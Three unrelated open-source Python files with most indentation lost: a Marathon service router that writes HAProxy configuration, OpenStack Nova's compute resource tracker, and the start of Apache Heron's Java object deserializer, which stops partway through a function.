https_frontends += https_frontend_acl.format(
hostname=app.hostname,
backend=backend
)
backends += templater.haproxy_backend_http_options
if app.sticky:
logger.debug("turning on sticky sessions")
backends += templater.haproxy_backend_sticky_options
frontend_backend_glue = templater.haproxy_frontend_backend_glue
frontends += frontend_backend_glue.format(backend=backend)
key_func = attrgetter('host', 'port')
for backendServer in sorted(app.backends, key=key_func):
logger.debug(
"backend server at %s:%d",
backendServer.host,
backendServer.port)
serverName = re.sub(
r'[^a-zA-Z0-9\-]', '_',
backendServer.host + '_' + str(backendServer.port))
backend_server_options = templater.haproxy_backend_server_options
backends += backend_server_options.format(
host=backendServer.host,
port=backendServer.port,
serverName=serverName,
cookieOptions=' check cookie ' +
serverName if app.sticky else ''
)
config += http_frontends
config += https_frontends
config += frontends
config += backends
return config
def reloadConfig():
logger.debug("trying to find out how to reload the configuration")
if os.path.isfile('/etc/init/haproxy.conf'):
logger.debug("we seem to be running on an Upstart based system")
reloadCommand = ['reload', 'haproxy']
elif (os.path.isfile('/usr/lib/systemd/system/haproxy.service') or
os.path.isfile('/etc/systemd/system/haproxy.service')):
logger.debug("we seem to be running on systemd based system")
reloadCommand = ['systemctl', 'reload', 'haproxy']
else:
logger.debug("we seem to be running on a sysvinit based system")
reloadCommand = ['/etc/init.d/haproxy', 'reload']
logger.info("reloading using %s", " ".join(reloadCommand))
try:
subprocess.check_call(reloadCommand)
except OSError as ex:
logger.error("unable to reload config using command %s",
" ".join(reloadCommand))
logger.error("OSError: %s", ex)
except subprocess.CalledProcessError as ex:
logger.error("unable to reload config using command %s",
" ".join(reloadCommand))
logger.error("reload returned non-zero: %s", ex)
def writeConfig(config, config_file):
# Write config to a temporary location
fd, haproxyTempConfigFile = mkstemp()
logger.debug("writing config to temp file %s", haproxyTempConfigFile)
with os.fdopen(fd, 'w') as haproxyTempConfig:
haproxyTempConfig.write(config)
# Move into place
logger.debug("moving temp file %s to %s",
haproxyTempConfigFile,
config_file)
move(haproxyTempConfigFile, config_file)
def compareWriteAndReloadConfig(config, config_file):
# See if the last config on disk matches this, and if so don't reload
# haproxy
runningConfig = str()
try:
logger.debug("reading running config from %s", config_file)
with open(config_file, "r") as f:
runningConfig = f.read()
except IOError:
logger.warning("couldn't open config file for reading")
if runningConfig != config:
logger.info(
"running config is different from generated config - reloading")
writeConfig(config, config_file)
reloadConfig()
def get_apps(marathon):
tasks = marathon.tasks()
apps = dict()
for task in tasks:
# For each task, extract the app it belongs to and add a
# backend for each service it provides
if 'servicePorts' not in task:
continue
for i in xrange(len(task['servicePorts'])):
# Marathon 0.7.6 bug workaround
if len(task['host']) == 0:
logger.warning("Ignoring Marathon task without host " +
task['id'])
continue
servicePort = task['servicePorts'][i]
port = task['ports'][i] if len(task['ports']) else servicePort
appId = task['appId']
if appId not in apps:
app_tmp = MarathonApp(marathon, appId)
if 'HAPROXY_GROUP' in app_tmp.app['env']:
app_tmp.groups = \
app_tmp.app['env']['HAPROXY_GROUP'].split(',')
apps[appId] = app_tmp
app = apps[appId]
if servicePort not in app.services:
app.services[servicePort] = MarathonService(
appId, servicePort)
service = app.services[servicePort]
service.groups = app.groups
# Load environment variable configuration
# TODO(cmaloney): Move to labels once those are supported
# throughout the stack
for key_unformatted in env_keys:
key = key_unformatted.format(i)
if key in app.app[u'env']:
func = env_keys[key_unformatted]
func(service, app.app[u'env'][key])
service.add_backend(task['host'], port)
# Convert into a list for easier consumption
apps_list = list()
for app in apps.values():
for service in app.services.values():
apps_list.append(service)
return apps_list
def regenerate_config(apps, config_file, groups):
compareWriteAndReloadConfig(config(apps, groups), config_file)
class MarathonEventSubscriber(object):
def __init__(self, marathon, addr, config_file, groups):
marathon.add_subscriber(addr)
self.__marathon = marathon
# appId -> MarathonApp
self.__apps = dict()
self.__config_file = config_file
self.__groups = groups
# Fetch the base data
self.reset_from_tasks()
def reset_from_tasks(self):
self.__apps = get_apps(self.__marathon)
regenerate_config(self.__apps, self.__config_file, self.__groups)
def handle_event(self, event):
if event['eventType'] == 'status_update_event':
# TODO (cmaloney): Handle events more intelligently so we don't
# unnecessarily hammer the Marathon API.
self.reset_from_tasks()
def get_arg_parser():
parser = argparse.ArgumentParser(
description="Marathon HAProxy Service Router")
parser.add_argument("--longhelp",
help="Print out configuration details",
action="store_true"
)
parser.add_argument("--marathon", "-m",
nargs="+",
help="Marathon endpoint, eg. -m " +
"http://marathon1:8080 -m http://marathon2:8080"
)
parser.add_argument("--listening", "-l",
help="The HTTP address that Marathon can call this " +
"script back at (http://lb1:8080)"
)
default_log_socket = "/dev/log"
if sys.platform == "darwin":
default_log_socket = "/var/run/syslog"
parser.add_argument("--syslog-socket",
help="Socket to write syslog messages to",
default=default_log_socket
)
parser.add_argument("--haproxy-config",
help="Location of haproxy configuration",
default="/etc/haproxy/haproxy.cfg"
)
parser.add_argument("--group",
help="Only generate config for apps which list the "
"specified names. Defaults to apps without groups. "
"Use '*' to match all groups",
action="append",
default=list())
return parser
def run_server(marathon, callback_url, config_file, groups):
subscriber = MarathonEventSubscriber(marathon,
callback_url,
config_file,
groups)
# TODO(cmaloney): Switch to a sane http server
# TODO(cmaloney): Good exception catching, etc
def wsgi_app(env, start_response):
length = int(env['CONTENT_LENGTH'])
data = env['wsgi.input'].read(length)
subscriber.handle_event(json.loads(data))
# TODO(cmaloney): Make this have a simple useful webui for debugging /
# monitoring
start_response('200 OK', [('Content-Type', 'text/html')])
return "Got it\n"
try:
port = int(callback_url.split(':')[-1])
except ValueError:
port = 8000 # no port or invalid port specified
logger.info("Serving on port {}...".format(port))
httpd = make_server('', port, wsgi_app)
httpd.serve_forever()
def setup_logging(syslog_socket):
logger.setLevel(logging.DEBUG)
    syslogHandler = SysLogHandler(syslog_socket)
consoleHandler = logging.StreamHandler()
formatter = logging.Formatter('%(name)s: %(message)s')
syslogHandler.setFormatter(formatter)
consoleHandler.setFormatter(formatter)
# syslogHandler.setLevel(logging.ERROR)
logger.addHandler(syslogHandler)
logger.addHandler(consoleHandler)
if __name__ == '__main__':
# Process arguments
arg_parser = get_arg_parser()
args = arg_parser.parse_args()
# Print the long help text if flag is set
if args.longhelp:
print __doc__
sys.exit()
# otherwise make sure that a Marathon URL was specified
else:
if args.marathon is None:
arg_parser.error('argument --marathon/-m is required')
# Setup logging
setup_logging(args.syslog_socket)
# Marathon API connector
marathon = Marathon(args.marathon)
# If in listening mode, spawn a webserver waiting for events. Otherwise
# just write the config.
if args.listening:
run_server(marathon, args.listening, args.haproxy_config, args.group)
else:
# Generate base config
regenerate_config(get_apps(marathon), args.haproxy_config, args.group)
|
|
# Copyright (c) 2012 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Track resources like memory and disk for a compute host. Provides the
scheduler with useful information about availability through the ComputeNode
model.
"""
from nova.compute import claims
from nova.compute import instance_types
from nova.compute import task_states
from nova.compute import vm_states
from nova import conductor
from nova import context
from nova import db
from nova import exception
from nova.openstack.common import cfg
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import lockutils
from nova.openstack.common import log as logging
resource_tracker_opts = [
cfg.IntOpt('reserved_host_disk_mb', default=0,
help='Amount of disk in MB to reserve for the host'),
cfg.IntOpt('reserved_host_memory_mb', default=512,
help='Amount of memory in MB to reserve for the host'),
cfg.StrOpt('compute_stats_class',
default='nova.compute.stats.Stats',
help='Class that will manage stats for the local compute host')
]
CONF = cfg.CONF
CONF.register_opts(resource_tracker_opts)
LOG = logging.getLogger(__name__)
COMPUTE_RESOURCE_SEMAPHORE = claims.COMPUTE_RESOURCE_SEMAPHORE
class ResourceTracker(object):
"""Compute helper class for keeping track of resource usage as instances
are built and destroyed.
"""
def __init__(self, host, driver, nodename):
self.host = host
self.driver = driver
self.nodename = nodename
self.compute_node = None
self.stats = importutils.import_object(CONF.compute_stats_class)
self.tracked_instances = {}
self.tracked_migrations = {}
self.conductor_api = conductor.API()
@lockutils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, 'nova-')
def instance_claim(self, context, instance_ref, limits=None):
"""Indicate that some resources are needed for an upcoming compute
instance build operation.
This should be called before the compute node is about to perform
an instance build operation that will consume additional resources.
:param context: security context
:param instance_ref: instance to reserve resources for
:param limits: Dict of oversubscription limits for memory, disk,
and CPUs.
:returns: A Claim ticket representing the reserved resources. It can
be used to revert the resource usage if an error occurs
during the instance build.
"""
if self.disabled:
# compute_driver doesn't support resource tracking, just
# set the 'host' and node fields and continue the build:
self._set_instance_host_and_node(context, instance_ref)
return claims.NopClaim()
# sanity checks:
if instance_ref['host']:
LOG.warning(_("Host field should not be set on the instance until "
"resources have been claimed."),
instance=instance_ref)
if instance_ref['node']:
LOG.warning(_("Node field should be not be set on the instance "
"until resources have been claimed."),
instance=instance_ref)
claim = claims.Claim(instance_ref, self)
if claim.test(self.compute_node, limits):
self._set_instance_host_and_node(context, instance_ref)
# Mark resources in-use and update stats
self._update_usage_from_instance(self.compute_node, instance_ref)
# persist changes to the compute node:
self._update(context, self.compute_node)
return claim
else:
raise exception.ComputeResourcesUnavailable()
@lockutils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, 'nova-')
def resize_claim(self, context, instance_ref, instance_type, limits=None):
"""Indicate that resources are needed for a resize operation to this
compute host.
:param context: security context
:param instance_ref: instance to reserve resources for
:param instance_type: new instance_type being resized to
:param limits: Dict of oversubscription limits for memory, disk,
and CPUs.
        :returns: A Claim ticket representing the reserved resources. It
                  should be used to finalize the resource claim or free the
                  resources after the compute operation is finished.
"""
if self.disabled:
# compute_driver doesn't support resource tracking, just
# generate the migration record and continue the resize:
migration_ref = self._create_migration(context, instance_ref,
instance_type)
return claims.NopClaim(migration=migration_ref)
claim = claims.ResizeClaim(instance_ref, instance_type, self)
if claim.test(self.compute_node, limits):
migration_ref = self._create_migration(context, instance_ref,
instance_type)
claim.migration = migration_ref
# Mark the resources in-use for the resize landing on this
# compute host:
self._update_usage_from_migration(self.compute_node, migration_ref)
elevated = context.elevated()
self._update(elevated, self.compute_node)
return claim
else:
raise exception.ComputeResourcesUnavailable()
def _create_migration(self, context, instance, instance_type):
"""Create a migration record for the upcoming resize. This should
        be done while the COMPUTE_RESOURCE_SEMAPHORE is held so the resource
claim will not be lost if the audit process starts.
"""
# TODO(russellb): no-db-compute: Send the old instance type
# info that is needed via rpc so db access isn't required
# here.
old_instance_type_id = instance['instance_type_id']
old_instance_type = instance_types.get_instance_type(
old_instance_type_id)
return db.migration_create(context.elevated(),
{'instance_uuid': instance['uuid'],
'source_compute': instance['host'],
'source_node': instance['node'],
'dest_compute': self.host,
'dest_node': self.nodename,
'dest_host': self.driver.get_host_ip_addr(),
'old_instance_type_id': old_instance_type['id'],
'new_instance_type_id': instance_type['id'],
'status': 'pre-migrating'})
def _set_instance_host_and_node(self, context, instance_ref):
"""Tag the instance as belonging to this host. This should be done
        while the COMPUTE_RESOURCE_SEMAPHORE is held so the resource claim
will not be lost if the audit process starts.
"""
values = {'host': self.host, 'node': self.nodename,
'launched_on': self.host}
self.conductor_api.instance_update(context, instance_ref['uuid'],
**values)
instance_ref['host'] = self.host
instance_ref['launched_on'] = self.host
instance_ref['node'] = self.nodename
def abort_instance_claim(self, instance):
"""Remove usage from the given instance"""
# flag the instance as deleted to revert the resource usage
# and associated stats:
instance['vm_state'] = vm_states.DELETED
self._update_usage_from_instance(self.compute_node, instance)
ctxt = context.get_admin_context()
self._update(ctxt, self.compute_node)
def abort_resize_claim(self, instance_uuid, instance_type):
"""Remove usage for an incoming migration"""
if instance_uuid in self.tracked_migrations:
migration, itype = self.tracked_migrations.pop(instance_uuid)
if instance_type['id'] == migration['new_instance_type_id']:
self.stats.update_stats_for_migration(itype, sign=-1)
self._update_usage(self.compute_node, itype, sign=-1)
ctxt = context.get_admin_context()
self._update(ctxt, self.compute_node)
@lockutils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, 'nova-')
def update_usage(self, context, instance):
"""Update the resource usage and stats after a change in an
instance
"""
if self.disabled:
return
uuid = instance['uuid']
# don't update usage for this instance unless it submitted a resource
# claim first:
if uuid in self.tracked_instances:
self._update_usage_from_instance(self.compute_node, instance)
self._update(context.elevated(), self.compute_node)
@property
def disabled(self):
return self.compute_node is None
@lockutils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, 'nova-')
def update_available_resource(self, context):
"""Override in-memory calculations of compute node resource usage based
on data audited from the hypervisor layer.
Add in resource claims in progress to account for operations that have
declared a need for resources, but not necessarily retrieved them from
the hypervisor layer yet.
"""
LOG.audit(_("Auditing locally available compute resources"))
resources = self.driver.get_available_resource(self.nodename)
if not resources:
# The virt driver does not support this function
LOG.audit(_("Virt driver does not support "
"'get_available_resource' Compute tracking is disabled."))
self.compute_node = None
return
self._verify_resources(resources)
self._report_hypervisor_resource_view(resources)
# Grab all instances assigned to this node:
instances = db.instance_get_all_by_host_and_node(context, self.host,
self.nodename)
# Now calculate usage based on instance utilization:
self._update_usage_from_instances(resources, instances)
# Grab all in-progress migrations:
migrations = db.migration_get_in_progress_by_host_and_node(context,
self.host, self.nodename)
self._update_usage_from_migrations(resources, migrations)
# Detect and account for orphaned instances that may exist on the
# hypervisor, but are not in the DB:
orphans = self._find_orphaned_instances()
self._update_usage_from_orphans(resources, orphans)
self._report_final_resource_view(resources)
self._sync_compute_node(context, resources)
def _sync_compute_node(self, context, resources):
"""Create or update the compute node DB record"""
if not self.compute_node:
# we need a copy of the ComputeNode record:
service = self._get_service(context)
if not service:
                # no service record, disable resource tracking
return
compute_node_refs = service['compute_node']
if compute_node_refs:
for cn in compute_node_refs:
if cn.get('hypervisor_hostname') == self.nodename:
self.compute_node = cn
break
if not self.compute_node:
# Need to create the ComputeNode record:
resources['service_id'] = service['id']
self._create(context, resources)
LOG.info(_('Compute_service record created for %s ') % self.host)
else:
# just update the record:
self._update(context, resources, prune_stats=True)
LOG.info(_('Compute_service record updated for %s ') % self.host)
def _create(self, context, values):
"""Create the compute node in the DB"""
# initialize load stats from existing instances:
compute_node = db.compute_node_create(context, values)
self.compute_node = dict(compute_node)
def _get_service(self, context):
try:
return db.service_get_all_compute_by_host(context,
self.host)[0]
except exception.NotFound:
LOG.warn(_("No service record for host %s"), self.host)
def _report_hypervisor_resource_view(self, resources):
"""Log the hypervisor's view of free memory in and free disk.
This is just a snapshot of resource usage recorded by the
virt driver.
"""
free_ram_mb = resources['memory_mb'] - resources['memory_mb_used']
free_disk_gb = resources['local_gb'] - resources['local_gb_used']
LOG.debug(_("Hypervisor: free ram (MB): %s") % free_ram_mb)
LOG.debug(_("Hypervisor: free disk (GB): %s") % free_disk_gb)
vcpus = resources['vcpus']
if vcpus:
free_vcpus = vcpus - resources['vcpus_used']
LOG.debug(_("Hypervisor: free VCPUs: %s") % free_vcpus)
else:
LOG.debug(_("Hypervisor: VCPU information unavailable"))
def _report_final_resource_view(self, resources):
"""Report final calculate of free memory and free disk including
instance calculations and in-progress resource claims. These
values will be exposed via the compute node table to the scheduler.
"""
LOG.audit(_("Free ram (MB): %s") % resources['free_ram_mb'])
LOG.audit(_("Free disk (GB): %s") % resources['free_disk_gb'])
vcpus = resources['vcpus']
if vcpus:
free_vcpus = vcpus - resources['vcpus_used']
LOG.audit(_("Free VCPUS: %s") % free_vcpus)
else:
LOG.audit(_("Free VCPU information unavailable"))
def _update(self, context, values, prune_stats=False):
"""Persist the compute node updates to the DB"""
compute_node = db.compute_node_update(context,
self.compute_node['id'], values, prune_stats)
self.compute_node = dict(compute_node)
def confirm_resize(self, context, migration, status='confirmed'):
"""Cleanup usage for a confirmed resize"""
elevated = context.elevated()
db.migration_update(elevated, migration['id'],
{'status': status})
self.update_available_resource(elevated)
def revert_resize(self, context, migration, status='reverted'):
"""Cleanup usage for a reverted resize"""
self.confirm_resize(context, migration, status)
def _update_usage(self, resources, usage, sign=1):
resources['memory_mb_used'] += sign * usage['memory_mb']
resources['local_gb_used'] += sign * usage.get('root_gb', 0)
resources['local_gb_used'] += sign * usage.get('ephemeral_gb', 0)
# free ram and disk may be negative, depending on policy:
resources['free_ram_mb'] = (resources['memory_mb'] -
resources['memory_mb_used'])
resources['free_disk_gb'] = (resources['local_gb'] -
resources['local_gb_used'])
resources['running_vms'] = self.stats.num_instances
resources['vcpus_used'] = self.stats.num_vcpus_used
def _update_usage_from_migration(self, resources, migration):
"""Update usage for a single migration. The record may
represent an incoming or outbound migration.
"""
uuid = migration['instance_uuid']
LOG.audit(_("Updating from migration %s") % uuid)
incoming = (migration['dest_compute'] == self.host and
migration['dest_node'] == self.nodename)
outbound = (migration['source_compute'] == self.host and
migration['source_node'] == self.nodename)
same_node = (incoming and outbound)
instance = self.tracked_instances.get(uuid, None)
itype = None
if same_node:
# same node resize. record usage for whichever instance type the
# instance is *not* in:
if (instance['instance_type_id'] ==
migration['old_instance_type_id']):
itype = migration['new_instance_type_id']
else:
# instance record already has new flavor, hold space for a
# possible revert to the old instance type:
itype = migration['old_instance_type_id']
elif incoming and not instance:
# instance has not yet migrated here:
itype = migration['new_instance_type_id']
elif outbound and not instance:
# instance migrated, but record usage for a possible revert:
itype = migration['old_instance_type_id']
if itype:
instance_type = instance_types.get_instance_type(itype)
self.stats.update_stats_for_migration(instance_type)
self._update_usage(resources, instance_type)
resources['stats'] = self.stats
self.tracked_migrations[uuid] = (migration, instance_type)
def _update_usage_from_migrations(self, resources, migrations):
self.tracked_migrations.clear()
filtered = {}
        # do some defensive filtering against bad migration records in the
        # database:
for migration in migrations:
instance = migration['instance']
if not instance:
# migration referencing deleted instance
continue
uuid = instance['uuid']
# skip migration if instance isn't in a resize state:
if not self._instance_in_resize_state(instance):
LOG.warn(_("Instance not resizing, skipping migration."),
instance_uuid=uuid)
continue
# filter to most recently updated migration for each instance:
m = filtered.get(uuid, None)
if not m or migration['updated_at'] >= m['updated_at']:
filtered[uuid] = migration
for migration in filtered.values():
self._update_usage_from_migration(resources, migration)
def _update_usage_from_instance(self, resources, instance):
"""Update usage for a single instance."""
uuid = instance['uuid']
is_new_instance = uuid not in self.tracked_instances
is_deleted_instance = instance['vm_state'] == vm_states.DELETED
if is_new_instance:
self.tracked_instances[uuid] = jsonutils.to_primitive(instance)
sign = 1
if is_deleted_instance:
self.tracked_instances.pop(uuid)
sign = -1
self.stats.update_stats_for_instance(instance)
# if it's a new or deleted instance:
if is_new_instance or is_deleted_instance:
            # new or deleted instance: update compute node resource usage:
self._update_usage(resources, instance, sign=sign)
resources['current_workload'] = self.stats.calculate_workload()
resources['stats'] = self.stats
def _update_usage_from_instances(self, resources, instances):
"""Calculate resource usage based on instance utilization. This is
different than the hypervisor's view as it will account for all
instances assigned to the local compute host, even if they are not
currently powered on.
"""
self.tracked_instances.clear()
# purge old stats
self.stats.clear()
        # set some initial values, reserve room for host/hypervisor:
resources['local_gb_used'] = CONF.reserved_host_disk_mb / 1024
resources['memory_mb_used'] = CONF.reserved_host_memory_mb
resources['vcpus_used'] = 0
resources['free_ram_mb'] = (resources['memory_mb'] -
resources['memory_mb_used'])
resources['free_disk_gb'] = (resources['local_gb'] -
resources['local_gb_used'])
resources['current_workload'] = 0
resources['running_vms'] = 0
for instance in instances:
if instance['vm_state'] == vm_states.DELETED:
continue
else:
self._update_usage_from_instance(resources, instance)
def _find_orphaned_instances(self):
"""Given the set of instances and migrations already account for
by resource tracker, sanity check the hypervisor to determine
if there are any "orphaned" instances left hanging around.
Orphans could be consuming memory and should be accounted for in
usage calculations to guard against potential out of memory
errors.
"""
uuids1 = frozenset(self.tracked_instances.keys())
uuids2 = frozenset(self.tracked_migrations.keys())
uuids = uuids1 | uuids2
usage = self.driver.get_per_instance_usage()
vuuids = frozenset(usage.keys())
orphan_uuids = vuuids - uuids
orphans = [usage[uuid] for uuid in orphan_uuids]
return orphans
def _update_usage_from_orphans(self, resources, orphans):
"""Include orphaned instances in usage."""
for orphan in orphans:
uuid = orphan['uuid']
memory_mb = orphan['memory_mb']
LOG.warn(_("Detected running orphan instance: %(uuid)s (consuming "
"%(memory_mb)s MB memory") % locals())
# just record memory usage for the orphan
usage = {'memory_mb': orphan['memory_mb']}
self._update_usage(resources, usage)
def _verify_resources(self, resources):
resource_keys = ["vcpus", "memory_mb", "local_gb", "cpu_info",
"vcpus_used", "memory_mb_used", "local_gb_used"]
missing_keys = [k for k in resource_keys if k not in resources]
if missing_keys:
reason = _("Missing keys: %s") % missing_keys
raise exception.InvalidInput(reason=reason)
def _instance_in_resize_state(self, instance):
vm = instance['vm_state']
task = instance['task_state']
if vm == vm_states.RESIZED:
return True
if (vm == vm_states.ACTIVE and task in [task_states.RESIZE_PREP,
task_states.RESIZE_MIGRATING, task_states.RESIZE_MIGRATED,
task_states.RESIZE_FINISH]):
return True
return False
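# Hedged sketch of how the compute manager is expected to drive this tracker
# (the tracker object itself is constructed elsewhere; the variable names
# below are illustrative only):
#
#   ctxt = context.get_admin_context()
#   tracker.update_available_resource(ctxt)    # periodic re-sync with hypervisor
#   tracker.update_usage(ctxt, instance)       # after an instance changes state
#   tracker.confirm_resize(ctxt, migration)    # when a resize is confirmed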
|
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Provides functions for reading and writing (writing is WIP currently) Java objects
serialized or will be deserialized by ObjectOutputStream. This form of object
representation is a standard data interchange format in Java world.
javaobj module exposes an API familiar to users of the standard
library marshal, pickle and json modules.
See: http://download.oracle.com/javase/6/docs/platform/serialization/spec/protocol.html
"""
import io
import struct
from heron.common.src.python.utils.log import Log
def log_debug(message, ident=0):
"""log debugging info"""
Log.debug(" " * (ident * 2) + str(message))
def log_error(message, ident=0):
"""log error info"""
Log.error(" " * (ident * 2) + str(message))
__version__ = "$Revision: 20 $"
def load(file_object):
"""
Deserializes Java primitive data and objects serialized by ObjectOutputStream
from a file-like object.
"""
marshaller = JavaObjectUnmarshaller(file_object)
marshaller.add_transformer(DefaultObjectTransformer())
return marshaller.readObject()
# pylint: disable=undefined-variable
def loads(value: bytes):
"""
Deserializes Java objects and primitive data serialized by ObjectOutputStream
from a string.
"""
f = io.BytesIO(value)
marshaller = JavaObjectUnmarshaller(f)
marshaller.add_transformer(DefaultObjectTransformer())
return marshaller.readObject()
def dumps(obj):
"""
  Serializes Java primitive data and objects previously unmarshaled by
  load()/loads() back into a byte string.
"""
marshaller = JavaObjectMarshaller()
return marshaller.dump(obj)
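# Hedged usage sketch: the three entry points above deliberately mirror the
# pickle-style API. The file name below is hypothetical; any stream produced
# by Java's ObjectOutputStream should work.
#
#   with open("payload.ser", "rb") as f:
#       obj = load(f)      # read one top-level object from a file-like object
#   data = open("payload.ser", "rb").read()
#   obj = loads(data)      # same, but from an in-memory byte string
#   blob = dumps(obj)      # best-effort re-serialization (writing is WIP)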
_java_primitives = set([
"java.lang.Double",
"java.lang.Float",
"java.lang.Integer",
"java.lang.Long"])
class JavaClass:
"""Java class representation"""
def __init__(self):
self.name = None
self.serialVersionUID = None
self.flags = None
self.fields_names = []
self.fields_types = []
self.superclass = None
def __str__(self):
return self.__repr__()
def __repr__(self):
return "[%s:0x%X]" % (self.name, self.serialVersionUID)
class JavaObject:
"""Java object representation"""
def __init__(self):
self.classdesc = None
self.annotations = []
def get_class(self):
"""get class"""
return self.classdesc
def __str__(self):
"""get reprensentation in string"""
return self.__repr__()
def __repr__(self):
"""get reprensentation"""
name = "UNKNOWN"
if self.classdesc:
name = self.classdesc.name
return "<javaobj:%s>" % name
def classname(self):
name = "UNKNOWN"
if self.classdesc:
name = self.classdesc.name
return name
def is_primitive(self):
return self.classname() in _java_primitives
def copy(self, new_object):
"""copy an object"""
new_object.classdesc = self.classdesc
for name in self.classdesc.fields_names:
new_object.__setattr__(name, getattr(self, name))
class JavaObjectConstants:
"""class about Java object constants"""
STREAM_MAGIC = 0xaced
STREAM_VERSION = 0x05
TC_NULL = 0x70
TC_REFERENCE = 0x71
TC_CLASSDESC = 0x72
TC_OBJECT = 0x73
TC_STRING = 0x74
TC_ARRAY = 0x75
TC_CLASS = 0x76
TC_BLOCKDATA = 0x77
TC_ENDBLOCKDATA = 0x78
TC_RESET = 0x79
TC_BLOCKDATALONG = 0x7A
TC_EXCEPTION = 0x7B
TC_LONGSTRING = 0x7C
TC_PROXYCLASSDESC = 0x7D
TC_ENUM = 0x7E
TC_MAX = 0x7E
# classDescFlags
SC_WRITE_METHOD = 0x01 # if SC_SERIALIZABLE
SC_BLOCK_DATA = 0x08 # if SC_EXTERNALIZABLE
SC_SERIALIZABLE = 0x02
SC_EXTERNALIZABLE = 0x04
SC_ENUM = 0x10
# type definition chars (typecode)
TYPE_BYTE = 'B' # 0x42
TYPE_CHAR = 'C'
TYPE_DOUBLE = 'D' # 0x44
TYPE_FLOAT = 'F' # 0x46
TYPE_INTEGER = 'I' # 0x49
TYPE_LONG = 'J' # 0x4A
TYPE_SHORT = 'S' # 0x53
TYPE_BOOLEAN = 'Z' # 0x5A
TYPE_OBJECT = 'L' # 0x4C
TYPE_ARRAY = '[' # 0x5B
# list of supported typecodes listed above
TYPECODES_LIST = [
# primitive types
TYPE_BYTE,
TYPE_CHAR,
TYPE_DOUBLE,
TYPE_FLOAT,
TYPE_INTEGER,
TYPE_LONG,
TYPE_SHORT,
TYPE_BOOLEAN,
# object types
TYPE_OBJECT,
TYPE_ARRAY]
BASE_REFERENCE_IDX = 0x7E0000
# pylint: disable=missing-docstring
class JavaObjectUnmarshaller(JavaObjectConstants):
"""Java object unmarshaller"""
def __init__(self, stream=None):
self.opmap = {
self.TC_NULL: self.do_null,
self.TC_CLASSDESC: self.do_classdesc,
self.TC_OBJECT: self.do_object,
self.TC_STRING: self.do_string,
self.TC_ARRAY: self.do_array,
self.TC_CLASS: self.do_class,
self.TC_BLOCKDATA: self.do_blockdata,
self.TC_REFERENCE: self.do_reference,
self.TC_ENUM: self.do_enum,
      self.TC_ENDBLOCKDATA: self.do_null,  # note that we are reusing do_null
}
self.current_object = None
self.reference_counter = 0
self.references = []
self.object_stream = stream
self._readStreamHeader()
self.object_transformers = []
def readObject(self):
"""read object"""
try:
_, res = self._read_and_exec_opcode(ident=0)
position_bak = self.object_stream.tell()
the_rest = self.object_stream.read()
if the_rest:
log_error("Warning!!!!: Stream still has %s bytes left.\
Enable debug mode of logging to see the hexdump." % len(the_rest))
log_debug(self._create_hexdump(the_rest))
else:
log_debug("Java Object unmarshalled succesfully!")
self.object_stream.seek(position_bak)
return res
except Exception:
self._oops_dump_state()
raise
def add_transformer(self, transformer):
"""add to object transformer"""
self.object_transformers.append(transformer)
def _readStreamHeader(self):
(magic, version) = self._readStruct(">HH")
if magic != self.STREAM_MAGIC or version != self.STREAM_VERSION:
raise IOError("The stream is not java serialized object.\
Invalid stream header: %04X%04X" % (magic, version))
def _read_and_exec_opcode(self, ident=0, expect=None):
(opid, ) = self._readStruct(">B")
log_debug("OpCode: 0x%X" % opid, ident)
if expect and opid not in expect:
raise IOError("Unexpected opcode 0x%X" % opid)
handler = self.opmap.get(opid)
if not handler:
raise RuntimeError("Unknown OpCode in the stream: 0x%x" % opid)
return (opid, handler(ident=ident))
def _readStruct(self, unpack):
length = struct.calcsize(unpack)
ba = self.object_stream.read(length)
if len(ba) != length:
raise RuntimeError("Stream has been ended unexpectedly while unmarshaling.")
return struct.unpack(unpack, ba)
def _readString(self):
(length, ) = self._readStruct(">H")
ba = self.object_stream.read(length)
return ba
def do_classdesc(self, parent=None, ident=0):
"""do_classdesc"""
# TC_CLASSDESC className serialVersionUID newHandle classDescInfo
# classDescInfo:
# classDescFlags fields classAnnotation superClassDesc
# classDescFlags:
# (byte) // Defined in Terminal Symbols and Constants
# fields:
# (short)<count> fieldDesc[count]
# fieldDesc:
# primitiveDesc
# objectDesc
# primitiveDesc:
# prim_typecode fieldName
# objectDesc:
# obj_typecode fieldName className1
clazz = JavaClass()
log_debug("[classdesc]", ident)
ba = self._readString()
clazz.name = ba
log_debug("Class name: %s" % ba, ident)
(serialVersionUID, newHandle, classDescFlags) = self._readStruct(">LLB")
clazz.serialVersionUID = serialVersionUID
clazz.flags = classDescFlags
self._add_reference(clazz)
log_debug("Serial: 0x%X newHandle: 0x%X.\
classDescFlags: 0x%X" % (serialVersionUID, newHandle, classDescFlags), ident)
(length, ) = self._readStruct(">H")
log_debug("Fields num: 0x%X" % length, ident)
clazz.fields_names = []
clazz.fields_types = []
for _ in range(length):
(typecode, ) = self._readStruct(">B")
field_name = self._readString()
field_type = None
field_type = self._convert_char_to_type(typecode)
if field_type == self.TYPE_ARRAY:
_, field_type = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_STRING, self.TC_REFERENCE])
assert isinstance(field_type, str)
# if field_type is not None:
# field_type = "array of " + field_type
# else:
# field_type = "array of None"
elif field_type == self.TYPE_OBJECT:
_, field_type = self._read_and_exec_opcode(
ident=ident+1, expect=[self.TC_STRING, self.TC_REFERENCE])
